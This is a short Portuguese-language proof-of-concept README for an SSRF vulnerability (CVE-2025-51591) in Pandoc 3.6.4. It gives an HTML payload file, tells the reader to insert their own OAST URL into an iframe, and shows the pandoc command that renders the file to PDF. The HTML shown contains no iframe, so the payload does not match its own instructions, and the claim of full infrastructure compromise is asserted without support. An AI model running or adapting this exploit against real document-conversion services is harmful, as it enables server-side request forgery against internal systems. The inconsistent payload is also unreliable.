
CVE-2025-51591 Prova de Conceito da vulnerabilidade SSRF Pandoc
Uma Server-Side Request Forgery (SSRF) no JGM Pandoc v3.6.4 permite que atacantes obtenham acesso e comprometam toda a infraestrutura ao injetar um iframe malicioso.
⚠️ substitua a url do iframe pela sua própria url OAST. ⚠️
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CVE-2025-51591 Proof Of Concept</title>
</head>
<body>
<h1>
CVE-2025-51591 Proof Of Concept
</h1>
</body>
</html>
pandoc payload.html -o output1.pdf